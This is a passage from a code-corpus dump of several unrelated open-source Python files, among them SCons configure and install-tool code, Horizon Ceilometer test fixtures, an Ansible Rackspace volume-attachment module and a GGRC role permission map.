def TryLink( self, text, extension ):
"""Compiles the program given in text to an executable env.Program,
using extension as file extension (e.g. '.c'). Returns 1, if
compilation was successful, 0 otherwise. The target is saved in
self.lastTarget (for further processing).
"""
return self.TryBuild(self.env.Program, text, extension )
def TryRun(self, text, extension ):
"""Compiles and runs the program given in text, using extension
as file extension (e.g. '.c'). Returns (1, outputStr) on success,
(0, '') otherwise. The target (a file containing the program's stdout)
is saved in self.lastTarget (for further processing).
"""
ok = self.TryLink(text, extension)
if( ok ):
prog = self.lastTarget
pname = prog.path
output = self.confdir.File(os.path.basename(pname)+'.out')
node = self.env.Command(output, prog, [ [ pname, ">", "${TARGET}"] ])
ok = self.BuildNodes(node)
if ok:
outputStr = output.get_contents()
return( 1, outputStr)
return (0, "")
class TestWrapper(object):
"""A wrapper around Tests (to ensure sanity)"""
def __init__(self, test, sconf):
self.test = test
self.sconf = sconf
def __call__(self, *args, **kw):
if not self.sconf.active:
raise SCons.Errors.UserError
context = CheckContext(self.sconf)
ret = self.test(context, *args, **kw)
if self.sconf.config_h is not None:
self.sconf.config_h_text = self.sconf.config_h_text + context.config_h
context.Result("error: no result")
return ret
def AddTest(self, test_name, test_instance):
"""Adds test_class to this SConf instance. It can be called with
self.test_name(...)"""
setattr(self, test_name, SConfBase.TestWrapper(test_instance, self))
def AddTests(self, tests):
"""Adds all the tests given in the tests dictionary to this SConf
instance
"""
for name in tests.keys():
self.AddTest(name, tests[name])
def _createDir( self, node ):
dirName = str(node)
if dryrun:
if not os.path.isdir( dirName ):
raise ConfigureDryRunError(dirName)
else:
if not os.path.isdir( dirName ):
os.makedirs( dirName )
node._exists = 1
def _startup(self):
"""Private method. Set up logstream, and set the environment
variables necessary for a piped build
"""
global _ac_config_logs
global sconf_global
global SConfFS
self.lastEnvFs = self.env.fs
self.env.fs = SConfFS
self._createDir(self.confdir)
self.confdir.up().add_ignore( [self.confdir] )
if self.logfile is not None and not dryrun:
# truncate logfile, if SConf.Configure is called for the first time
# in a build
if self.logfile in _ac_config_logs:
log_mode = "a"
else:
_ac_config_logs[self.logfile] = None
log_mode = "w"
fp = open(str(self.logfile), log_mode)
self.logstream = SCons.Util.Unbuffered(fp)
# logfile may stay in a build directory, so we tell
# the build system not to override it with a eventually
# existing file with the same name in the source directory
self.logfile.dir.add_ignore( [self.logfile] )
tb = traceback.extract_stack()[-3-self.depth]
old_fs_dir = SConfFS.getcwd()
SConfFS.chdir(SConfFS.Top, change_os_dir=0)
self.logstream.write('file %s,line %d:\n\tConfigure(confdir = %s)\n' %
(tb[0], tb[1], str(self.confdir)) )
SConfFS.chdir(old_fs_dir)
else:
self.logstream = None
# we use a special builder to create source files from TEXT
action = SCons.Action.Action(_createSource,
_stringSource)
sconfSrcBld = SCons.Builder.Builder(action=action)
self.env.Append( BUILDERS={'SConfSourceBuilder':sconfSrcBld} )
self.config_h_text = _ac_config_hs.get(self.config_h, "")
self.active = 1
# only one SConf instance should be active at a time ...
sconf_global = self
def _shutdown(self):
"""Private method. Reset to non-piped spawn"""
global sconf_global, _ac_config_hs
if not self.active:
raise SCons.Errors.UserError("Finish may be called only once!")
if self.logstream is not None and not dryrun:
self.logstream.write("\n")
self.logstream.close()
self.logstream = None
# remove the SConfSourceBuilder from the environment
blds = self.env['BUILDERS']
del blds['SConfSourceBuilder']
self.env.Replace( BUILDERS=blds )
self.active = 0
sconf_global = None
if not self.config_h is None:
_ac_config_hs[self.config_h] = self.config_h_text
self.env.fs = self.lastEnvFs
class CheckContext(object):
"""Provides a context for configure tests. Defines how a test writes to the
screen and log file.
A typical test is just a callable with an instance of CheckContext as
first argument:
def CheckCustom(context, ...)
context.Message('Checking my weird test ... ')
ret = myWeirdTestFunction(...)
context.Result(ret)
Often, myWeirdTestFunction will be one of
context.TryCompile/context.TryLink/context.TryRun. The results of
those are cached, for they are only rebuild, if the dependencies have
changed.
"""
def __init__(self, sconf):
"""Constructor. Pass the corresponding SConf instance."""
self.sconf = sconf
self.did_show_result = 0
# for Conftest.py:
self.vardict = {}
self.havedict = {}
self.headerfilename = None
self.config_h = "" # config_h text will be stored here
# we don't regenerate the config.h file after each test. That means,
# that tests won't be able to include the config.h file, and so
# they can't do an #ifdef HAVE_XXX_H. This shouldn't be a major
# issue, though. If it turns out, that we need to include config.h
# in tests, we must ensure, that the dependencies are worked out
# correctly. Note that we can't use Conftest.py's support for config.h,
# cause we will need to specify a builder for the config.h file ...
def Message(self, text):
"""Inform about what we are doing right now, e.g.
'Checking for SOMETHING ... '
"""
self.Display(text)
self.sconf.cached = 1
self.did_show_result = 0
def Result(self, res):
"""Inform about the result of the test. res may be an integer or a
string. In case of an integer, the written text will be 'yes' or 'no'.
The result is only displayed when self.did_show_result is not set.
"""
if isinstance(res, (int, bool)):
if res:
text = "yes"
else:
text = "no"
elif isinstance(res, str):
text = res
else:
raise TypeError("Expected string, int or bool, got " + str(type(res)))
if self.did_show_result == 0:
# Didn't show result yet, do it now.
self.Display(text + "\n")
self.did_show_result = 1
def TryBuild(self, *args, **kw):
return self.sconf.TryBuild(*args, **kw)
def TryAction(self, *args, **kw):
return self.sconf.TryAction(*args, **kw)
def TryCompile(self, *args, **kw):
return self.sconf.TryCompile(*args, **kw)
def TryLink(self, *args, **kw):
return self.sconf.TryLink(*args, **kw)
def TryRun(self, *args, **kw):
return self.sconf.TryRun(*args, **kw)
def __getattr__( self, attr ):
if( attr == 'env' ):
return self.sconf.env
elif( attr == 'lastTarget' ):
return self.sconf.lastTarget
else:
raise AttributeError("CheckContext instance has no attribute '%s'" % attr)
#### Stuff used by Conftest.py (look there for explanations).
def BuildProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.Program, text, ext)
def CompileProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.Object, text, ext)
def CompileSharedObject(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $SHCC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.SharedObject, text, ext)
def RunProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
st, out = self.TryRun(text, ext)
return not st, out
def AppendLIBS(self, lib_name_list):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Append(LIBS = lib_name_list)
return oldLIBS
def PrependLIBS(self, lib_name_list):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Prepend(LIBS = lib_name_list)
return oldLIBS
def SetLIBS(self, val):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Replace(LIBS = val)
return oldLIBS
def Display(self, msg):
if self.sconf.cached:
# We assume that Display is called twice for each test here
# once for the Checking for ... message and once for the result.
# The self.sconf.cached flag can only be set between those calls
msg = "(cached) " + msg
self.sconf.cached = 0
progress_display(msg, append_newline=0)
self.Log("scons: Configure: " + msg + "\n")
def Log(self, msg):
if self.sconf.logstream is not None:
self.sconf.logstream.write(msg)
#### End of stuff used by Conftest.py.
def SConf(*args, **kw):
if kw.get(build_type, True):
kw['_depth'] = kw.get('_depth', 0) + 1
for bt in build_types:
try:
del kw[bt]
except KeyError:
pass
return SConfBase(*args, **kw)
else:
return SCons.Util.Null()
def CheckFunc(context, function_name, header = None, language = None):
res = SCons.Conftest.CheckFunc(context, function_name, header = header, language = language)
context.did_show_result = 1
return not res
def CheckType(context, type_name, includes = "", language = None):
res = SCons.Conftest.CheckType(context, type_name,
header = includes, language = language)
context.did_show_result = 1
return not res
def CheckTypeSize(context, type_name, includes = "", language = None, expect = None):
res = SCons.Conftest.CheckTypeSize(context, type_name,
header = includes, language = language,
expect = expect)
context.did_show_result = 1
return res
def CheckDeclaration(context, declaration, includes = "", language = None):
res = SCons.Conftest.CheckDeclaration(context, declaration,
includes = includes,
language = language)
context.did_show_result = 1
return not res
def createIncludesFromHeaders(headers, leaveLast, include_quotes = '""'):
# used by CheckHeader and CheckLibWithHeader to produce C - #include
# statements from the specified header (list)
if not SCons.Util.is_List(headers):
headers = [headers]
l = []
if leaveLast:
lastHeader = headers[-1]
headers = headers[:-1]
else:
lastHeader = None
for s in headers:
l.append("#include %s%s%s\n"
% (include_quotes[0], s, include_quotes[1]))
return ''.join(l), lastHeader
def CheckHeader(context, header, include_quotes = '<>', language = None):
"""
A test for a C or C++ header file.
"""
prog_prefix, hdr_to_check = \
createIncludesFromHeaders(header, 1, include_quotes)
res = SCons.Conftest.CheckHeader(context, hdr_to_check, prog_prefix,
language = language,
include_quotes = include_quotes)
context.did_show_result = 1
return not res
def CheckCC(context):
res = SCons.Conftest.CheckCC(context)
context.did_show_result = 1
return not res
def CheckCXX(context):
res = SCons.Conftest.CheckCXX(context)
context.did_show_result = 1
return not res
def CheckSHCC(context):
res = SCons.Conftest.CheckSHCC(context)
context.did_show_result = 1
return not res
def CheckSHCXX(context):
res = SCons.Conftest.CheckSHCXX(context)
context.did_show_result = 1
return not res
# Bram: Make this function obsolete? CheckHeader() is more generic.
def CheckCHeader(context, header, include_quotes = '""'):
"""
A test for a C header file.
"""
return CheckHeader(context, header, include_quotes, language = "C")
# Bram: Make this function obsolete? CheckHeader() is more generic.
def CheckCXXHeader(context, header, include_quotes = '""'):
"""
A test for a C++ header file.
"""
return CheckHeader(context, header, include_quotes, language = "C++")
def CheckLib(context, library = None, symbol = "main",
header = None, language = None, autoadd = 1):
"""
A test for a library. See also CheckLibWithHeader.
Note that library may also be None to test whether the given symbol
compiles without flags.
"""
if library == []:
library = [None]
if not SCons.Util.is_List(library):
library = [library]
# ToDo: accept path for the library
res = SCons.Conftest.CheckLib(context, library, symbol, header = header,
language = language, autoadd = autoadd)
context.did_show_result = 1
return not res
# XXX
# Bram: Can only include one header and can't use #ifdef HAVE_HEADER_H.
def CheckLibWithHeader(context, libs, header, language,
call = None, autoadd = 1):
# ToDo: accept path for library. Support system header files.
"""
Another (more sophisticated) test for a library.
Checks, if library and header is available for language (may be 'C'
or 'CXX'). Call maybe be a valid expression _with_ a trailing ';'.
As in CheckLib, we support library=None, to test if the call compiles
without extra link flags.
"""
prog_prefix, dummy = \
createIncludesFromHeaders(header, 0)
if libs == []:
libs = [None]
if not SCons.Util.is_List(libs):
libs = [libs]
res = SCons.Conftest.CheckLib(context, libs, None, prog_prefix,
call = call, language = language, autoadd = autoadd)
context.did_show_result = 1
return not res
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
napalm-automation/napalm-logs
|
refs/heads/develop
|
tests/test_base.py
|
1
|
# -*- coding: utf-8 -*-
'''
Test the napalm-logs base class.
'''
from __future__ import absolute_import
from __future__ import unicode_literals
|
VaneCloud/horizon
|
refs/heads/stable/kilo
|
openstack_dashboard/test/test_data/ceilometer_data.py
|
56
|
# Copyright 2012 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ceilometerclient.v2 import meters
from ceilometerclient.v2 import resources
from ceilometerclient.v2 import samples
from ceilometerclient.v2 import statistics
from keystoneclient.v2_0 import tenants
from keystoneclient.v2_0 import users
from openstack_dashboard.api import ceilometer
from openstack_dashboard.test.test_data import utils
def data(TEST):
TEST.ceilometer_users = utils.TestDataContainer()
TEST.ceilometer_tenants = utils.TestDataContainer()
TEST.resources = utils.TestDataContainer()
TEST.api_resources = utils.TestDataContainer()
TEST.samples = utils.TestDataContainer()
TEST.meters = utils.TestDataContainer()
TEST.statistics = utils.TestDataContainer()
TEST.global_disk_usages = utils.TestDataContainer()
TEST.global_network_usages = utils.TestDataContainer()
TEST.global_network_traffic_usages = utils.TestDataContainer()
TEST.global_object_store_usages = utils.TestDataContainer()
TEST.statistics_array = utils.TestDataContainer()
# users
ceilometer_user_dict1 = {'id': "1",
'name': 'user',
'email': 'test@example.com',
'password': 'password',
'token': 'test_token',
'project_id': '1',
'enabled': True,
'domain_id': "1"}
ceilometer_user_dict2 = {'id': "2",
'name': 'user2',
'email': 'test2@example.com',
'password': 'password',
'token': 'test_token',
'project_id': '2',
'enabled': True,
'domain_id': "2"}
TEST.ceilometer_users.add(users.User(None,
ceilometer_user_dict1))
TEST.ceilometer_users.add(users.User(None,
ceilometer_user_dict2))
# Tenants.
tenant_dict = {'id': "1",
'name': 'test_tenant',
'description': "a test tenant.",
'enabled': True,
'domain_id': '1'}
tenant_dict_2 = {'id': "2",
'name': 'disabled_tenant',
'description': "a disabled test tenant.",
'enabled': False,
'domain_id': '2'}
tenant_dict_3 = {'id': "3",
'name': u'\u4e91\u89c4\u5219',
'description': "an unicode-named tenant.",
'enabled': True,
'domain_id': '2'}
ceilometer_tenant = tenants.Tenant(tenants.TenantManager,
tenant_dict)
ceilometer_disabled_tenant = tenants.Tenant(tenants.TenantManager,
tenant_dict_2)
ceilometer_tenant_unicode = tenants.Tenant(tenants.TenantManager,
tenant_dict_3)
TEST.ceilometer_tenants.add(ceilometer_tenant,
ceilometer_disabled_tenant,
ceilometer_tenant_unicode)
# resources
resource_dict_1 = dict(
resource_id='fake_resource_id',
project_id='fake_project_id',
user_id="fake_user_id",
timestamp='2012-07-02T10:42:00.000000',
metadata={'tag': 'self.counter3', 'display_name': 'test-server'},
links=[{'url': 'test_url', 'rel': 'storage.objects'}],
)
resource_dict_2 = dict(
resource_id='fake_resource_id2',
project_id='fake_project_id',
user_id="fake_user_id",
timestamp='2012-07-02T10:42:00.000000',
metadata={'tag': 'self.counter3', 'display_name': 'test-server'},
links=[{'url': 'test_url', 'rel': 'storage.objects'}],
)
resource_dict_3 = dict(
resource_id='fake_resource_id3',
project_id='fake_project_id',
user_id="fake_user_id",
timestamp='2012-07-02T10:42:00.000000',
metadata={'tag': 'self.counter3', 'display_name': 'test-server'},
links=[{'url': 'test_url', 'rel': 'instance'}],
)
resource_dict_4 = dict(
resource_id='fake_resource_id3',
project_id='fake_project_id',
user_id="fake_user_id",
timestamp='2012-07-02T10:42:00.000000',
metadata={'tag': 'self.counter3', 'display_name': 'test-server'},
links=[{'url': 'test_url', 'rel': 'memory'}],
)
resource_1 = resources.Resource(resources.ResourceManager(None),
resource_dict_1)
resource_2 = resources.Resource(resources.ResourceManager(None),
resource_dict_2)
resource_3 = resources.Resource(resources.ResourceManager(None),
resource_dict_3)
resource_4 = resources.Resource(resources.ResourceManager(None),
resource_dict_4)
TEST.resources.add(resource_1)
TEST.resources.add(resource_2)
TEST.resources.add(resource_3)
# Having a separate set of fake objects for openstack_dashboard
# api Resource class. This is required because of additional methods
# defined in openstack_dashboard.api.ceilometer.Resource
api_resource_1 = ceilometer.Resource(resource_1)
api_resource_2 = ceilometer.Resource(resource_2)
api_resource_3 = ceilometer.Resource(resource_3)
api_resource_4 = ceilometer.Resource(resource_4)
TEST.api_resources.add(api_resource_1)
TEST.api_resources.add(api_resource_2)
TEST.api_resources.add(api_resource_3)
TEST.api_resources.add(api_resource_4)
# samples
sample_dict_1 = {'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id',
'counter_name': 'image',
'counter_type': 'gauge',
'counter_unit': 'image',
'counter_volume': 1,
'timestamp': '2012-12-21T11:00:55.000000',
'metadata': {'name1': 'value1', 'name2': 'value2'},
'message_id': 'fake_message_id'}
sample_dict_2 = {'resource_id': 'fake_resource_id2',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id',
'counter_name': 'image',
'counter_type': 'gauge',
'counter_unit': 'image',
'counter_volume': 1,
'timestamp': '2012-12-21T11:00:55.000000',
'metadata': {'name1': 'value1', 'name2': 'value2'},
'message_id': 'fake_message_id'}
sample_1 = samples.Sample(samples.SampleManager(None), sample_dict_1)
sample_2 = samples.Sample(samples.SampleManager(None), sample_dict_2)
TEST.samples.add(sample_1)
TEST.samples.add(sample_2)
# meters
meter_dict_1 = {'name': 'instance',
'type': 'gauge',
'unit': 'instance',
'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id'}
meter_dict_2 = {'name': 'instance',
'type': 'gauge',
'unit': 'instance',
'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id'}
meter_dict_3 = {'name': 'disk.read.bytes',
'type': 'gauge',
'unit': 'instance',
'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id'}
meter_dict_4 = {'name': 'disk.write.bytes',
'type': 'gauge',
'unit': 'instance',
'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id'}
meter_1 = meters.Meter(meters.MeterManager(None), meter_dict_1)
meter_2 = meters.Meter(meters.MeterManager(None), meter_dict_2)
meter_3 = meters.Meter(meters.MeterManager(None), meter_dict_3)
meter_4 = meters.Meter(meters.MeterManager(None), meter_dict_4)
TEST.meters.add(meter_1)
TEST.meters.add(meter_2)
TEST.meters.add(meter_3)
TEST.meters.add(meter_4)
# statistic
statistic_dict_1 = {'min': 1,
'max': 9,
'avg': 4.55,
'sum': 45,
'count': 10,
'duration_start': '2012-12-21T11:00:55.000000',
'duration_end': '2012-12-21T11:00:55.000000',
'period': 7200,
'period_start': '2012-12-21T11:00:55.000000',
'period_end': '2012-12-21T11:00:55.000000'}
statistic_1 = statistics.Statistics(statistics.StatisticsManager(None),
statistic_dict_1)
TEST.statistics.add(statistic_1)
|
Trois-Six/ansible-modules-core
|
refs/heads/devel
|
cloud/rackspace/rax_cbs_attachments.py
|
157
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
DOCUMENTATION = '''
---
module: rax_cbs_attachments
short_description: Manipulate Rackspace Cloud Block Storage Volume Attachments
description:
- Manipulate Rackspace Cloud Block Storage Volume Attachments
version_added: 1.6
options:
device:
description:
- The device path to attach the volume to, e.g. /dev/xvde
default: null
required: true
volume:
description:
- Name or id of the volume to attach/detach
default: null
required: true
server:
description:
- Name or id of the server to attach/detach
default: null
required: true
state:
description:
- Indicate desired state of the resource
choices:
- present
- absent
default: present
required: true
wait:
description:
- wait for the volume to be in 'in-use'/'available' state before returning
default: "no"
choices:
- "yes"
- "no"
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
author:
- "Christopher H. Laco (@claco)"
- "Matt Martz (@sivel)"
extends_documentation_fragment: rackspace.openstack
'''
EXAMPLES = '''
- name: Attach a Block Storage Volume
gather_facts: False
hosts: local
connection: local
tasks:
- name: Storage volume attach request
local_action:
module: rax_cbs_attachments
credentials: ~/.raxpub
volume: my-volume
server: my-server
device: /dev/xvdd
region: DFW
wait: yes
state: present
register: my_volume
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def cloud_block_storage_attachments(module, state, volume, server, device,
wait, wait_timeout):
cbs = pyrax.cloud_blockstorage
cs = pyrax.cloudservers
if cbs is None or cs is None:
module.fail_json(msg='Failed to instantiate client. This '
'typically indicates an invalid region or an '
'incorrectly capitalized region name.')
changed = False
instance = {}
volume = rax_find_volume(module, pyrax, volume)
if not volume:
module.fail_json(msg='No matching storage volumes were found')
if state == 'present':
server = rax_find_server(module, pyrax, server)
if (volume.attachments and
volume.attachments[0]['server_id'] == server.id):
changed = False
elif volume.attachments:
module.fail_json(msg='Volume is attached to another server')
else:
try:
volume.attach_to_instance(server, mountpoint=device)
changed = True
except Exception, e:
module.fail_json(msg='%s' % e.message)
volume.get()
for key, value in vars(volume).iteritems():
if (isinstance(value, NON_CALLABLES) and
not key.startswith('_')):
instance[key] = value
result = dict(changed=changed)
if volume.status == 'error':
result['msg'] = '%s failed to build' % volume.id
elif wait:
attempts = wait_timeout / 5
pyrax.utils.wait_until(volume, 'status', 'in-use',
interval=5, attempts=attempts)
volume.get()
result['volume'] = rax_to_dict(volume)
if 'msg' in result:
module.fail_json(**result)
else:
module.exit_json(**result)
elif state == 'absent':
server = rax_find_server(module, pyrax, server)
if (volume.attachments and
volume.attachments[0]['server_id'] == server.id):
try:
volume.detach()
if wait:
pyrax.utils.wait_until(volume, 'status', 'available',
interval=3, attempts=0,
verbose=False)
changed = True
except Exception, e:
module.fail_json(msg='%s' % e.message)
volume.get()
changed = True
elif volume.attachments:
module.fail_json(msg='Volume is attached to another server')
result = dict(changed=changed, volume=rax_to_dict(volume))
if volume.status == 'error':
result['msg'] = '%s failed to build' % volume.id
if 'msg' in result:
module.fail_json(**result)
else:
module.exit_json(**result)
module.exit_json(changed=changed, volume=instance)
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
device=dict(required=True),
volume=dict(required=True),
server=dict(required=True),
state=dict(default='present', choices=['present', 'absent']),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300)
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together()
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
device = module.params.get('device')
volume = module.params.get('volume')
server = module.params.get('server')
state = module.params.get('state')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
setup_rax_module(module, pyrax)
cloud_block_storage_attachments(module, state, volume, server, device,
wait, wait_timeout)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
### invoke the module
main()
|
AleksNeStu/ggrc-core
|
refs/heads/release/0.10-Raspberry
|
src/ggrc_basic_permissions/roles/ProgramOwner.py
|
7
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
scope = "Private Program"
description = """
User with authorization to peform administrative tasks such as associating
users to roles within the scope of of a program.<br/><br/>When a person
creates a program they are automatically given the ProgramOwner role. This
allows them to Edit, Delete, or Map objects to the Program. It also allows
them to add people and assign them roles when their programs are private.
ProgramOwner is the most powerful role.
"""
permissions = {
"read": [
"ObjectDocument",
"ObjectPerson",
"Program",
"ProgramControl",
"Relationship",
"UserRole",
"Context",
],
"create": [
"ObjectDocument",
"ObjectPerson",
"ProgramControl",
"Relationship",
"UserRole",
"Audit",
"Snapshot",
],
"view_object_page": [
"__GGRC_ALL__"
],
"update": [
"ObjectDocument",
"ObjectPerson",
"Program",
"ProgramControl",
"Relationship",
"UserRole"
],
"delete": [
"ObjectDocument",
"ObjectPerson",
"Program",
"ProgramControl",
"Relationship",
"UserRole",
]
}
|
NickShaffner/rhea
|
refs/heads/master
|
rhea/cores/usbext/__init__.py
|
2
|
from __future__ import absolute_import
from .fpgalink import fpgalink
from .fpgalink import fpgalink_fx2
#from usbp import m_usbp
|
tomhughes/mapnik
|
refs/heads/master
|
scons/scons-local-4.1.0/SCons/Tool/install.py
|
2
|
"""SCons.Tool.install
Tool-specific initialization for the install tool.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import os
from shutil import copy2, copymode, copystat
import SCons.Action
import SCons.Tool
from SCons.Tool.linkCommon import StringizeLibSymlinks, CreateLibSymlinks, EmitLibSymlinks
import SCons.Util
#
# We keep track of *all* installed files.
_INSTALLED_FILES = []
_UNIQUE_INSTALLED_FILES = None
class CopytreeError(OSError):
pass
def scons_copytree(src, dst, symlinks=False, ignore=None, copy_function=copy2,
ignore_dangling_symlinks=False, dirs_exist_ok=False):
"""Recursively copy a directory tree, SCons version.
This is a modified copy of the Python 3.7 shutil.copytree function.
SCons update: dirs_exist_ok dictates whether to raise an
exception in case dst or any missing parent directory already
exists. Implementation depends on os.makedirs having a similar
flag, which it has since Python 3.2. This version also raises an
SCons-defined exception rather than the one defined locally to shtuil.
This version uses a change from Python 3.8.
TODO: we can remove this forked copy once the minimum Py version is 3.8.
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied. If the file pointed by the symlink doesn't
exist, an exception will be added in the list of errors raised in
an Error exception at the end of the copy process.
You can set the optional ignore_dangling_symlinks flag to true if you
want to silence this exception. Notice that this has no effect on
platforms that don't support os.symlink.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
The optional copy_function argument is a callable that will be used
to copy each file. It will be called with the source path and the
destination path as arguments. By default, copy2() is used, but any
function that supports the same signature (like copy()) can be used.
"""
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
os.makedirs(dst, exist_ok=dirs_exist_ok)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if os.path.islink(srcname):
linkto = os.readlink(srcname)
if symlinks:
# We can't just leave it to `copy_function` because legacy
# code with a custom `copy_function` may rely on copytree
# doing the right thing.
os.symlink(linkto, dstname)
copystat(srcname, dstname, follow_symlinks=not symlinks)
else:
# ignore dangling symlink if the flag is on
if not os.path.exists(linkto) and ignore_dangling_symlinks:
continue
# otherwise let the copy occurs. copy2 will raise an error
if os.path.isdir(srcname):
scons_copytree(srcname, dstname, symlinks, ignore,
copy_function, dirs_exist_ok)
else:
copy_function(srcname, dstname)
elif os.path.isdir(srcname):
scons_copytree(srcname, dstname, symlinks, ignore, copy_function, dirs_exist_ok)
else:
# Will raise a SpecialFileError for unsupported file types
copy_function(srcname, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except CopytreeError as err: # SCons change
errors.extend(err.args[0])
except OSError as why:
errors.append((srcname, dstname, str(why)))
try:
copystat(src, dst)
except OSError as why:
# Copying file access times may fail on Windows
if getattr(why, 'winerror', None) is None:
errors.append((src, dst, str(why)))
if errors:
raise CopytreeError(errors) # SCons change
return dst
#
# Functions doing the actual work of the Install Builder.
#
def copyFunc(dest, source, env):
"""Install a source file or directory into a destination by copying,
Mode/permissions bits will be copied as well.
"""
if os.path.isdir(source):
if os.path.exists(dest):
if not os.path.isdir(dest):
raise SCons.Errors.UserError("cannot overwrite non-directory `%s' with a directory `%s'" % (str(dest), str(source)))
else:
parent = os.path.split(dest)[0]
if not os.path.exists(parent):
os.makedirs(parent)
scons_copytree(source, dest, dirs_exist_ok=True)
else:
copy2(source, dest)
copymode(source, dest)
return 0
#
# Functions doing the actual work of the InstallVersionedLib Builder.
#
def copyFuncVersionedLib(dest, source, env):
"""Install a versioned library into a destination by copying,
Mode/permissions bits will be copied as well.
Any required symbolic links for other library names are created.
"""
if os.path.isdir(source):
raise SCons.Errors.UserError("cannot install directory `%s' as a version library" % str(source) )
else:
# remove the link if it is already there
try:
os.remove(dest)
except:
pass
copy2(source, dest)
copymode(source, dest)
installShlibLinks(dest, source, env)
return 0
def listShlibLinksToInstall(dest, source, env):
install_links = []
source = env.arg2nodes(source)
dest = env.fs.File(dest)
install_dir = dest.get_dir()
for src in source:
symlinks = getattr(getattr(src, 'attributes', None), 'shliblinks', None)
if symlinks:
for link, linktgt in symlinks:
link_base = os.path.basename(link.get_path())
linktgt_base = os.path.basename(linktgt.get_path())
install_link = env.fs.File(link_base, install_dir)
install_linktgt = env.fs.File(linktgt_base, install_dir)
install_links.append((install_link, install_linktgt))
return install_links
def installShlibLinks(dest, source, env):
"""If we are installing a versioned shared library create the required links."""
Verbose = False
symlinks = listShlibLinksToInstall(dest, source, env)
if Verbose:
print('installShlibLinks: symlinks={!r}'.format(StringizeLibSymlinks(symlinks)))
if symlinks:
CreateLibSymlinks(env, symlinks)
return
def installFunc(target, source, env):
"""Install a source file into a target using the function specified
as the INSTALL construction variable."""
try:
install = env['INSTALL']
except KeyError:
raise SCons.Errors.UserError('Missing INSTALL construction variable.')
assert len(target)==len(source), \
"Installing source %s into target %s: target and source lists must have same length."%(list(map(str, source)), list(map(str, target)))
for t,s in zip(target,source):
if install(t.get_path(),s.get_path(),env):
return 1
return 0
